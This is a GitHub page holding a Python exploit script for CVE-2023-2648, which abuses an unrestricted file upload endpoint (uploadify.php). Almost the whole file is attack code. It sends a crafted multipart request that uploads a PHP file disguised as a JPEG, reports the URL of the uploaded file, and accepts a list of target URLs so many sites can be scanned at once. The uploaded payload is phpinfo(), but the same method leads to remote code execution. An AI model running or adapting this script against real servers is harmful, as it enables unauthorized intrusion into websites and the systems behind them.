-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2023-2648.py
77 lines (63 loc) · 2.85 KB
/
CVE-2023-2648.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
import requests
import argparse
def Banner():
banner = """
______ _______ ____ ___ ____ _____ ____ __ _ _ ___
/ ___\ \ / / ____| |___ \ / _ \___ \|___ / |___ \ / /_ | || | ( _ )
| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____ __) | '_ \| || |_ / _ \
| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____/ __/| (_) |__ _| (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |_____|\___/ |_| \___/
Usage:python3 CVE-2023-2648.py -u https://127.0.0.1:8080
Usage:python3 CVE-2023-2648.py -f urls.txt
"""
print(banner)
def exploit_target(url, result_file):
path = "/inc/jquery/uploadify/uploadify.php"
full_url = url + path
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": "null",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"Connection": "close",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt"
}
data = (
"------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\r\n"
"Content-Disposition: form-data; name=\"Fdiledata\"; filename=\"uploadify.php.\"\r\n"
"Content-Type: image/jpeg\r\n"
"\r\n"
"<?php phpinfo();?>\r\n"
"------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--"
)
response = requests.post(full_url, headers=headers, data=data)
if response.status_code == 200:
print(url + "[+] 漏洞存在 ")
phpinfo_url = url + "/attachment/" + response.text + "uploadify.php"
print("请访问phpinfo地址:" + phpinfo_url)
result_file.write(f"phpinfo_url\n")
else:
print("[-] 漏洞不存在")
def main():
parser = argparse.ArgumentParser(description="CVE-2023-2648 检测工具 by 冰糖葫芦(脚本使用phpinfo文件上传)")
parser.add_argument("-u", "--target", help="单个目标URL")
parser.add_argument("-f", "--file", help="包含多个目标URL的文件")
args = parser.parse_args()
if args.target:
target_urls = [args.target]
elif args.file:
with open(args.file, "r") as f:
target_urls = f.read().splitlines()
else:
print("请使用 -u 或 -f 指定目标")
return
result_file = open("cve-2023-2648-result.txt", "a")
for url in target_urls:
exploit_target(url, result_file)
result_file.close()
if __name__ == "__main__":
Banner()
main()